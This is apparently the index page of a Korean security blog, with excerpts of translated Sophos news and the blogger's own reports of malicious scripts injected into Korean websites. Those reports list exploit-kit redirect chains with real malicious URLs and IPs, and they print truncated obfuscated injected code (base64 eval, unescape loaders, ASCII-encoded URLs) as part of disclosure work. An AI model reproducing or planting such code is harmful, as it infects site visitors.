본문 바로가기

security

[Sophos] 역습! 조지아(Georgia)를 염탐하는 동안, 그의 웹캠에 잡힌 해커 피의자 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=19100 역습! 조지아(Georgia)를 염탐하는 동안, 그의 웹캠에 잡힌 해커 피의자조지아(Georgia)는 악성코드를 웹사이트에 투입하고, 비밀정보를 훔치는 스파이웨어를 설치하며 컴퓨터 네트워크를 공격한 것에 대해 러시아에 근거지를 둔 해커를 오랫동안 비난해 왔습니다.이제 조지아 정부의 CERT(Computer Emergency Response Team)는 인터넷 공격이 러시아 보안 기관과 연관되어 있었다고 비난하고, 비밀리에 그의 컴퓨터를 해킹하고 그의 비디오 자료를 훔쳤다고 생각되는 해커에게 심지어 보복을 하였습니다.27 페이지짜리 보고서[PDF]에서, 조지아 정부는 20.. 더보기
구인 사이트 교차로 → http://www.icross.co.kr Yszz 0.11 vip 악성 스크립트 유포중!! 발견지 : http://www.icross.co.kr [교차로] →http://festival.cocobau.com/adm_site/e_show/e_th_abd.js →http://173.245.86.205/pic/img.js →http://173.245.86.205/pic/img.html (Yszz 1.5 vip) → http://173.245.86.152/img/jpg.css (최종파일) → http://173.245.86.205/pic/swfobject.js → http://173.245.86.205/pic/jpg.js →http://173.245.86.205/pic/css.html http://festival.cocobau.com/adm_site/e_show/e_th_abd.js ---------.. 더보기
중앙정보처리학원 → http://it.choongang.co.kr 악성 스크립트 유포중!! 원본 위치 : http://it.choongang.co.kr/curri/curri_week.asp?m=2 스크립트내에 두가지 스크립트가 존재한다 ! 717a766078707b613b62677c[생략]5b372e eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEdldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldEpbmtzDQp7DQoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhciAk[생략]wYWdlID0gZXhwbG9kZSgiXHJcblxyXG4iLCAkYnVmZik7DQogIAkJCXJldHVybiAkcGFnZVsxXTsNCiAgICB9DQoJfQ0KfQ==.. 더보기
[Sophos] 블랙홀 맬웨어 공격으로 이끄는 모욕적인 페이스북 이메일 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=19000 페이스북 사용자들은 누군가가 자신의 담벼락에 모욕적인 글을 남겼다고 하는 청하지도 않은 불필요한 이메일에 대한 경계를 늦추지 않도록 주의를 해야 합니다.안녕하세요, [OOO가] 여러분의 담벼락에 글을 남겼습니다. [OOO는] 'you piece of shit!!!'이라는 욕을 썼습니다. 내용을 보세요 이 글에 대한 답변은 이 메일로 회신해주십시오. 감사합니다. 페이스북 팀물론, 여러분이 경고를 받았다면 여러분은 누가 이메일을 보냈던지 진짜 페이스북에서 보낸 것처럼 속인 것에서 아주 어리석은 짓을 했다는 것을 눈치챘을 것입니다. 보낸 사람을 자세히 보면 예를 들어 주소가 .. 더보기
[Sophos] Apple, iOS 6에서 사용자 추적(User Tracking) 재게. 다음은 그 기능을 해제시키는 방법입니다. http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18900 개인 정보 보호 전문가들이 iPhone과 iPad 사용자들의 온라인 성향을 추적하기 위해 Apple이 UDID(universal device identifier)를 사용하는 것에 항의했을 때 Apple의 부정행위가 드러나게 되었습니다.이와 관련된 문제는 해커들이 디지털 미디어 회사인 블루토드(Bluetoad) 소유의 시스템을 감염시키고 거의 100만개 기기의 식별기호(ID)를 해킹한 이후 더욱 명백하게 되었습니다.이 정도면 충분한 거겠죠? 글쎄요. 아마도 아닌 것 같습니다.기기 추적이 iOS 6와 함께, 새로운 추적 기술인 IDFA(광고주를 위한 인식기, identifi.. 더보기
우연히 발견한 악성스크립트 ! 원본 위치 : http://kjclsb.buy3d.co.kr/style.css.js document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%[생략]68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%2631mbohvbhf[생략]%60vs%264C%261E%261B%264D0tdsjqu%264F1') 디코딩! textarea 태그 이용하는 방법도 괜찮은거 같.. 더보기
[Sophos]"미트 롬니 대통령 유력" - 블랙홀 맬웨어 공격으로 이끄는 허위 CNN 경보 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18800 어제 대략 오후1시경에, 소포스랩에서는 다가오는 미국 대통령 선거에 관심 있는 이들을 타깃으로 하는 첫 번째 악성 이메일을 받았습니다.그것은 2008년 대선 당시에 봤던 악성 활동의 급증을 감안하면 그렇게 놀라운 것은 아닙니다. 아마도 그 유혹이 아주 잘 작용되어, 심지어 오바마 대통령이 당선된 이후에도 수개월간 계속 되었습니다.이번 스팸 캠페인에 대한 제목줄에는 “CNN 속보 - 미트 롬니(Mitt Romney) 대통령 유력”이라고 적혀있습니다.열어보면 그것은 제일 먼저 “투표자의 60% 이상이 미트 롬니 지지”라는 것을 포함하여 오늘의 주요 이야기가 나오는 CNN 뉴.. 더보기
[Sophos] 여러분 집의 3D 맵을 만드는 안드로이드 맬웨어의 기술 검증 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18700 핸드폰 소유자의 집과 다른 공간들의 3D 비주얼 맵을 만들기 위해 핸드폰에 내장된 카메라와 기타 공간적인 센서를 이용하는 악성 안드로이드 어플리케이션이 생겨났다고 연구원들은 말합니다.미 해군(U.S. Navy)과 인디아나 대학(University of Indiana)에서 일하는 연구원들에 의해 PlaceRaider라는 별칭을 가진 맬웨어의 기술이 검증되었습니다.그 맬웨어는 안드로이드 모바일 기기에서 작동하면서, 빠르게 발전하는 모바일 플랫폼이 가상 도난(virtual theft)의 새로운 형태를 가능하게 할지도 모른다는 방식에 주의를 환기시키기 위해 제작되었습니다.지난 .. 더보기
Yszz 1.5 vip ! 발견지 : http://www.icross.co.kr/ →http://festival.cocobau.com/adm_site/e_show/e_th_ad.js →http://205.164.25.146/pic/img.js →http://205.164.25.146/pic/img.html (Yszz 1.5 vip) → http://205.164.25.146/pic/swfobject.js → http://205.164.25.146/pic/jpg.js →http://205.164.25.146/pic/css.html var K4Er = "%";var MDIxo=K4Er+"78"+K4Er+"6F";var OIai8=K4Er+"78"+K4Er+"6F"+K4Er+"31";var HHYWv=K4Er+"31"+"%59"+"%5.. 더보기
짱라이브(jjang Live) 특정 페이지내 악성코드 유포중! 감염 페이지 : http://www.jjanglive.com/upload/list.txt 현재 짱라이브 내에 비정상적이 페이지에서 악성코드가 유포중에 있습니다 ! 메인 페이지로 접속할때는 감염이 안되지만 이 특정 링크를 통해 접속 하실 경우 감염이 됨을 알려 드립니다 ! list.txt 내에 현재 코드는 ! 051049058104116116112058047047107111114101097046102111114 103101116109101050046105110102111047116101109112047108103108046103105102 이거 한줄로 되어있습니다. 3개씩 짤라서 아스키코드표와 대조해 본다면 쉽게 찾을 수 있습니다 ! 051,049,058,104,116,116,112,058,047,047,.. 더보기